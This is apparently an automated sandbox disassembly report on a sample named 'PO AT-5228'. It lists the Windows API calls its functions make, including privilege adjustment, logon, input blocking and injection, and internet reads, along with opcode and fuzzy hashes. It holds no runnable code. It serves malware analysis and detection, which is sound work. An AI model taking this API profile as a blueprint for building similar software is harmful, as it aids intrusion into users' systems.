                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 776f3de48990231b573b16bb653c5c33df7fae5e0c6d492db9020726cd5a4d4f
                                                                                        • Instruction ID: 04d8921160c2817dde75554222f46c9c3c6d3ca30f2b32b230f1c2f0437cba3b
                                                                                        • Opcode Fuzzy Hash: 776f3de48990231b573b16bb653c5c33df7fae5e0c6d492db9020726cd5a4d4f
                                                                                        • Instruction Fuzzy Hash: FC41B1356043029FCB08DF28C4D1AA9B7E4FF4A324F10459DF96A8B3A1DB71E944CB51
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                                                        • Instruction ID: 63c5ce325137e68f52579465abf3f5ac8a449841fab08656bc5d6c34332932be
                                                                                        • Opcode Fuzzy Hash: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                                                        • Instruction Fuzzy Hash: 1611B2313005106FE7215F26DC84F6F7BD8EF58761B0944ADF849EB241CF74D90286A4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                        • API String ID: 0-1546025612
                                                                                        • Opcode ID: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                                                        • Instruction ID: 6e94091f7ecc37b8bd4fb60a6a73474fd26d76bf5215eb374fcdbb9d181ca544
                                                                                        • Opcode Fuzzy Hash: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                                                        • Instruction Fuzzy Hash: E7926C71A0025ACBDF24CF59C8907AEB7F1FB54314F2581EAE816AB280D7799D81CF91
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7E014,74DF0AE0,00B7DEF1,00BFDC38,?,?), ref: 00B7E02C
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B7E03E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                                                        • Instruction ID: 854853465db5c15f9b1f300953951412f2399fdd963a79fc05e0611b5ad9185a
                                                                                        • Opcode Fuzzy Hash: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                                                        • Instruction Fuzzy Hash: AED09E745007129ED7215B65E84975276E4EF06711F1884A9E4A5A2150DAF4D8808661
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BA13DC
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: d93b60cd83b500951764be9229e778ef4fb5062c7a3396a71211ab6c159d917a
                                                                                        • Instruction ID: 51c0389857ebd390a6f869d6cf86f1f6b52eedb8f7d2c7f214d74bf027121b1d
                                                                                        • Opcode Fuzzy Hash: d93b60cd83b500951764be9229e778ef4fb5062c7a3396a71211ab6c159d917a
                                                                                        • Instruction Fuzzy Hash: D5321475A046059FCB68CF6DC48096AB7F0FF49320B15C9AEE49ADB3A1E770E941CB44
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B7B22F
                                                                                          • Part of subcall function 00B7B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                                                        Similarity
                                                                                        • API ID: Proc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2749884682-0
                                                                                        • Opcode ID: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                                                        • Instruction ID: 138a211812c2d65562acd21c73e7a9a970ab1033b0ad754ae93b2538e313b898
                                                                                        • Opcode Fuzzy Hash: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                                                        • Instruction Fuzzy Hash: ADA16760115005BADB287B295CC8FBF6DDDEB55344B14C1DEF83ADA682EB14DC01DA72
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BB43BF,00000000), ref: 00BB4FA6
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BB4FD2
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: a442b593a95b677f8f6722b6150f78ee616c12cc6204a6a97ea4b7baedd90a9a
                                                                                        • Instruction ID: b047379f32bd4fd1707ae150415373af4fa00615515e7a6202a956ea66fe4fee
                                                                                        • Opcode Fuzzy Hash: a442b593a95b677f8f6722b6150f78ee616c12cc6204a6a97ea4b7baedd90a9a
                                                                                        • Instruction Fuzzy Hash: 1141B171504609BFEB219A84D881FFF77ECFB40754F1040AAF609A7182DBF19E4196A0
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BAE20D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BAE267
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BAE2B4
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                                                        • Instruction ID: 93f0a2793f807f1a1f270af77677abf370d986b6428c16e8a05f879ea2ea0db4
                                                                                        • Opcode Fuzzy Hash: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                                                        • Instruction Fuzzy Hash: 10213A75A00218EFDB00EFA5D885AADBBF8FF49310F0484A9E945AB351DB31D905CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                          • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                        • GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 9f21f0caf5e95bb20417957feef7b9bfb9a29d3cbbe836f5484e3fc12e35f1db
                                                                                        • Instruction ID: 3ea0d817aadf95b28d2322a69ec609338a11f4188f8d68bf4df9de6d33438728
                                                                                        • Opcode Fuzzy Hash: 9f21f0caf5e95bb20417957feef7b9bfb9a29d3cbbe836f5484e3fc12e35f1db
                                                                                        • Instruction Fuzzy Hash: D611CEB2410205AFE718AF64EDC5D2BB7FDFF44310B20856EE05AA7241DBB0FC418A64
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66AF
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00BA66EC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66F5
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                                                        • Instruction ID: f3475b6f9ec052da5f2d03d8c044c4f062930cd58a70fa18b1dc0fe5c89c0818
                                                                                        • Opcode Fuzzy Hash: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                                                        • Instruction Fuzzy Hash: 6311A1B2D11228BEE7118BA8DC85FAFBBFCEB09714F004596F901E7190C2B49E0487A5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BA7223
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA723A
                                                                                        • FreeSid.ADVAPI32(?), ref: 00BA724A
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                                                        • Instruction ID: 480f40cafe683d4a141c1c62c6eaa4ff95de28c1b4114b9593fa389816a65f70
                                                                                        • Opcode Fuzzy Hash: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                                                        • Instruction Fuzzy Hash: 3DF01D76A44309BFDF04DFE4DD99AEEBBBCEF08301F104469A612E7591E6749A448B10
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAF599
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BAF5C9
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                                                        • Instruction ID: 2627d1b1802f562a1632b65609418bf3399012fd680e5cde35c23426b764c7c0
                                                                                        • Opcode Fuzzy Hash: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                                                        • Instruction Fuzzy Hash: CC11C4316042009FDB10EF68D885A2EB7E9FF95324F00895EF8A9DB391CF70AD018B81
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEA7
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEB9
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                                                        • Instruction ID: edca591faabf0cd9cd69384c35e25fc634423718cf3738900e646ebe2b10b86a
                                                                                        • Opcode Fuzzy Hash: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                                                        • Instruction Fuzzy Hash: 17F08231104229EBDB10ABA4DC89FFA77ADFF09351F0081A5F915D6191D670AA40CBA1
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BA4153
                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00BA4166
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                                                        • Instruction ID: 7160300bc763a0794f5d7a13b954d9de730ebfbb2d4d1c48b460c2fc0bcfa8d6
                                                                                        • Opcode Fuzzy Hash: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                                                        • Instruction Fuzzy Hash: F9F06D7080438DAFDB058FA0C845BBE7FB0EF10305F008449F965AA191D7B986129FA0
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                                                        • CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: dce243a35ac12cc4fd94096d53decd296668a4ef5770ec8a3547e48602985ec6
                                                                                        • Instruction ID: 4e475b3aa6a30ed4b92ece451cb173dc8048360d23c872c4384c35f6b11070d3
                                                                                        • Opcode Fuzzy Hash: dce243a35ac12cc4fd94096d53decd296668a4ef5770ec8a3547e48602985ec6
                                                                                        • Instruction Fuzzy Hash: 63E0E671000511AFE7252F54EC05D7777EAEF04321710C869F45A86471DB625C90DB55
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00B86DB3,-0000031A,?,?,00000001), ref: 00B881B1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B881BA
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                                                        • Instruction ID: 208007718896f0c6e15a22a7691d5d1c82d2783f56084b235d6dfa45ffefebba
                                                                                        • Opcode Fuzzy Hash: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                                                        • Instruction Fuzzy Hash: 1FB09232144648ABDB002BA1EC49B597F68EB08652F004010F60D4A0A18FB354108A9A
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                                                        • Instruction ID: ac43ffdc99d72e9f15f08067a4177806c965d37cd014e21e4dce649980b5efd0
                                                                                        • Opcode Fuzzy Hash: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                                                        • Instruction Fuzzy Hash: D7A23971A04259CFDB24CF59C4806ADBBF1FF48314F2581AAE859AB391DB349E81DF90
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                                                        • Instruction ID: 83c499c2e4b56d168345e0fc395484b66e31d293eabd415474c9a9cdf41e8b47
                                                                                        • Opcode Fuzzy Hash: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                                                        • Instruction Fuzzy Hash: 7F320621D29F414DD7236634C862335A399EFB73D4F15D767E819B69A6EF29C8838200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 31e134210624526f87f58a822ea35d2644e49c2a791467e1ff2b4e3735ad62a7
                                                                                        • Instruction ID: 14edc63126d442152b5a8e8eb54e225290a66d1f4195761d65a8bd4ad9b13e00
                                                                                        • Opcode Fuzzy Hash: 31e134210624526f87f58a822ea35d2644e49c2a791467e1ff2b4e3735ad62a7
                                                                                        • Instruction Fuzzy Hash: 6F229C716083019FD724DF14C891B6FBBE8EF84710F1449AEF89A97291EB75E944CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                                                        • Instruction ID: 6e4a161a123a45838dc849a32fb444bfa80051a33c41d5dbb2fd764b1873cd97
                                                                                        • Opcode Fuzzy Hash: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                                                        • Instruction Fuzzy Hash: 61B1D320D2AF414DD62396398871336BA9CAFBB2D5F92D717FD1676D22EF2185838180
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 00BAB6DF
                                                                                          • Part of subcall function 00B8344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BABDC3,00000000,?,?,?,?,00BABF70,00000000,?), ref: 00B83453
                                                                                          • Part of subcall function 00B8344A: __aulldiv.LIBCMT ref: 00B83473
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                                                        • Instruction ID: 19ee1d31b6d7e7fdfae09a5578d4589e009e697775e96dada3d6720161d68265
                                                                                        • Opcode Fuzzy Hash: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                                                        • Instruction Fuzzy Hash: CF2172726345108BC729CF28C491B96B7E1EB95310B248E7DE4E5CB2D1CB78BA06DB54
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 00BB6ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                                                        • Instruction ID: 34f424afcfe1fea166fc0dd0c080a1a77bf6c99af5fbd2dbcd4f533a429507a9
                                                                                        • Opcode Fuzzy Hash: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                                                        • Instruction Fuzzy Hash: 49E012353102046FD700EB69D844996B7ECEF74751F04C456E945D7261DAF4E8048B90
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BA74DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                                                        • Instruction ID: 81b13459b0360fa2ca66b72db87d988cc6fb8ac70c29c06e677fdc46dc2d1bfe
                                                                                        • Opcode Fuzzy Hash: 5d453fef3494f49c51e92478e4beaa2cb12060318fed219a14b35d7d4a398e98
                                                                                        • Instruction Fuzzy Hash: C7D09EA56EC70579FD2907249C5FF7619C8F30A7C1F9491C9B582CA6C3BCD458469132
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B9AD3E), ref: 00B9B124
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                                                        • Instruction ID: 98478a67ff078f2d5da852e8661f988c64d0df246348304aa2533695cd3046a7
                                                                                        • Opcode Fuzzy Hash: 94beaf83e03836ff75f2e877be9fc514bec272abc2f524ef677863c59d85c72c
                                                                                        • Instruction Fuzzy Hash: 62D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA25DA4A1C675D531AB50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                                                        • Instruction ID: 3c936e965291d19cf5f7bd2e0a0d88d638e5a13734318eab836cd539a842f4ba
                                                                                        • Opcode Fuzzy Hash: 4af125bace4d8327b566c72320003e421f87ddaa86557ec3979a7ce5657e956e
                                                                                        • Instruction Fuzzy Hash: 95C04CB1400159DFC751CBC0CD849EEB7BCAB04301F1440929105F2110DB709B459B72
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B8818F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                                                        • Instruction ID: cab4225cde725f14d1c9e79cd9e2d163a748c9998fd21db4d24f2910770f59da
                                                                                        • Opcode Fuzzy Hash: 842cdc8b21f1ea1277a42e3a38b91e3f7c520cd5bbff25d82d2b7a497e9ac567
                                                                                        • Instruction Fuzzy Hash: 17A0223200020CFBCF002F82FC088883F2CFB002A0B000020F80C0A030CFB3A8208ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 469789659c6734425f8084be37ce56aed331c49b9a77353e004290f1dc352ffb
                                                                                        • Instruction ID: 85ff1f3a6102204090a52e4e34e61bcf91c302189ed9fc9bf88209cb57dffc09
                                                                                        • Opcode Fuzzy Hash: 469789659c6734425f8084be37ce56aed331c49b9a77353e004290f1dc352ffb
                                                                                        • Instruction Fuzzy Hash: 88229E789042068FDB24DF58C490ABEB7F1FF14304F1481AAE96A9B351E739ED45CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
